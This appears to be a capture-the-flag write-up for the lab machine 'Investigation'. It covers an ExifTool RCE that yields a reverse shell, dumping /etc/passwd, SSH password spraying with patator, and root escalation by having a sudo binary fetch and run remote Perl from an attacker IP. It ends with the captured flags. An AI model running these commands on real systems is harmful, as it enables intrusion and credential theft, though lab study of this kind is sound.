Investigation
Interesting Things
Exfitool exploit
Noticing the image upload returns an exfitool scan went right for an exploit and found this for exfitool < v12.24 https://blog.convisoappsec.com/en/a-case-study-on-cve-2021-22204-exiftool-rce/
System Files
/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
smorton:x:1000:1000:eForenzics:/home/smorton:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
backup:x:34:34::/var/backups:/usr/sbin/nologin
fwupd-refresh:x:113:119:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
_laurel:x:997:997::/var/log/laurel:/bin/false
nmap
msgconvert
Windows Event log for Analysis.msg
Date: Tue, 16 Sept 2022 00:30:29 +0000
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary=16778160761.9Eca.513719
Content-Transfer-Encoding: 7bit
Subject: Windows Event Logs for Analysis
From: Thomas Jones <thomas.jones@eforenzics.htb>
To: Steve Morton <steve.morton@eforenzics.htb>
Thread-Topic: Windows Event Logs for Analysis
Accept-Language: en-US
Content-Language: en-US
--16778160761.9Eca.513719
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary=16778160760.ECD5c.513719
Content-Transfer-Encoding: 7bit
--16778160760.ECD5c.513719
Content-Type: text/plain; charset=ISO-8859-1
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
Hi Steve,
Can you look through these logs to see if our analysts have been logging on to the inspection terminal. I'm concerned that they are moving data on to production without following our data transfer procedures.
Regards.
Tom
Underneath this in the msg is the attachment for a zip file
CVE-2022-23935
Searched for exiftool v12.37
./CVE-2022-23935.py 10.10.14.58 9001
[+] Connected!!!!
_____ __ __ ______ ___ ___ ___ ___ ___ ____ ___ ____ _____
/ ____|\ \ / /| ____| |__ \ / _ \|__ \ |__ \ |__ \ |___ \ / _ \|___ \ | ____|
| | \ \ / / | |__ ______ ) || | | | ) | ) |______ ) | __) || (_) | __) || |__
| | \ \/ / | __||______|/ / | | | | / / / /|______|/ / |__ < \__, ||__ < |___ \
| |____ \ / | |____ / /_ | |_| |/ /_ / /_ / /_ ___) | / / ___) | ___) |
\_____| \/ |______| |____| \___/|____||____| |____||____/ /_/ |____/ |____/
by 0xFTW
[+] Trying to bind to :: on port 9001: Done
[+] Waiting for connections on :::9001: Got connection from ::ffff:10.10.11.197 on port 57474
[*] Switching to interactive mode
bash: cannot set terminal process group (957): Inappropriate ioctl for device
bash: no job control in this shell
www-data@investigation:~/uploads/1677813942$ $ whoami
whoami
www-data
chisel proxychains
Pivoting to 127.0.1.1
https://ap3x.github.io/posts/pivoting-with-chisel/ So we connect to the machine through it's IP 10.10.11.197, which will read in as 127.0.0.1 on the machine. Looking in /etc/hosts we see addtional entries for 127.0.1.1
Now we're connected through a sock5 proxy
We're able to run commands against that machines network
However there was nothing at 127.0.1.1 and this was a giant waste of time ("Great learning opportunity though")
patator
patator ssh_login port=22 host=10.10.11.197 user=FILE0 0=users password=FILE1 1=passwords
/usr/lib/python3/dist-packages/paramiko/transport.py:219: CryptographyDeprecationWarning: Blowfish has been deprecated
"class": algorithms.Blowfish,
23:47:22 patator INFO - Starting Patator 0.9 (https://github.com/lanjelot/patator) with python-3.9.2 at 2023-03-02 23:47 CST
23:47:22 patator INFO -
23:47:22 patator INFO - code size time | candidate | num | mesg
23:47:22 patator INFO - -----------------------------------------------------------------------------
23:47:23 patator INFO - 0 39 0.172 | smorton:Def@ultf0r3nz!csPa$ | 1 | SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5
23:47:25 patator INFO - 1 22 2.141 | Olivia Rae:Def@ultf0r3nz!csPa$ | 11 | Authentication failed.
23:47:25 patator INFO - 1 22 2.514 | tjones:Def@ultf0r3nz!csPa$ | 2 | Authentication failed.
23:47:25 patator INFO - 1 22 2.515 | ethanjames:Def@ultf0r3nz!csPa$ | 4 | Authentication failed.
23:47:25 patator INFO - 1 22 2.502 | charlottelouise:Def@ultf0r3nz!csPa$ | 8 | Authentication failed.
23:47:26 patator INFO - 1 22 3.134 | Ethan James:Def@ultf0r3nz!csPa$ | 3 | Authentication failed.
23:47:26 patator INFO - 1 22 3.108 | ethan:Def@ultf0r3nz!csPa$ | 6 | Authentication failed.
23:47:26 patator INFO - 1 22 3.342 | ethan.james:Def@ultf0r3nz!csPa$ | 5 | Authentication failed.
23:47:26 patator INFO - 1 22 3.344 | charlotte.louise:Def@ultf0r3nz!csPa$ | 9 | Authentication failed.
23:47:26 patator INFO - 1 22 3.436 | charlotte:Def@ultf0r3nz!csPa$ | 10 | Authentication failed.
23:47:27 patator INFO - 1 22 3.771 | Charlotte Louise:Def@ultf0r3nz!csPa$ | 7 | Authentication failed.
23:47:28 patator INFO - 1 22 3.029 | olivarae:Def@ultf0r3nz!csPa$ | 12 | Authentication failed.
23:47:28 patator INFO - 1 22 2.195 | :Def@ultf0r3nz!csPa$ | 15 | Authentication failed.
23:47:29 patator INFO - 1 22 2.835 | oliva.rae:Def@ultf0r3nz!csPa$ | 13 | Authentication failed.
23:47:29 patator INFO - 1 22 3.523 | oliva:Def@ultf0r3nz!csPa$ | 14 | Authentication failed.
23:47:30 patator INFO - Hits/Done/Skip/Fail/Size: 15/15/0/0/15, Avg: 2 r/s, Time: 0h 0m 7s
We have SSH login for smorton!
ghidra
main function
Explanation of exploit
It looks like the function is set to give the Exiting... message in three instances
- if it isn't provided with 3 parameters remember that in linux the call to the process is the first parameter
- if it isn't run by sudo which is why the sudo -l showing access is necessary to exploit this binary
- if the 3rd parameter isn't this specific string
lDnxUysaQn
Looking further we see that the second parameter needs to be a web call due to the _stream
__stream = fopen(*(char **)(param_2 + 0x10),"wb");
and that parameter ends up getting passed into a printf that calls perl %s
Foothold
RCE as www-data
/usr/local/investigation/.msg
Found SMTP information for two users SMTP:THOMAS.JONES@EFORENZICS.HTB SMTP:STEVE.MORTON@EFORENZICS.HTB
As well as a .msg with this hard to decipher bs
However I found a stackoverflow post with examples in python of how to extract the attachments https://stackoverflow.com/questions/55596218/how-to-use-python-to-read-and-extract-data-from-msg-files-on-linux
Inside it was evtx-logs.zip and compressed inside was security.evtx
Found this https://www.alishaaneja.com/evtx/ to examine the evtx While in the guide pulling the github repo I actually had the opportunity to contribute to the project https://github.com/williballenthin/python-evtx/pull/83
Obtaining User Flag
After getting the evtx into a text file I sorted it by uniq lines and grep'd for users and passwords.
And we find a password
Def@ultf0r3nz!csPa$
Let's see if it goes to any of the users we've spotted
Root Escalation
Spoting the vulnerability
Right away We notice we have sudo access on a /usr/bin/binary file
sudo -l
Matching Defaults entries for smorton on investigation:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User smorton may run the following commands on investigation:
(root) NOPASSWD: /usr/bin/binary
Obtaining Root Flag
A quick and dirty perl exploit calling a bash shell is all we need root-escalation.pl
-e exec "/bin/sh"
sudo /usr/bin/binary http://10.10.14.46:9000/root-escalation.pl lDnxUysaQn
Running...
# whoami
root
# cat /root/root.txt
308d76b132a51118c5e64dd4848a2391
Flags
User Flag
d42c068a48e318e84cc03225dd0aca97Root Flag
308d76b132a51118c5e64dd4848a2391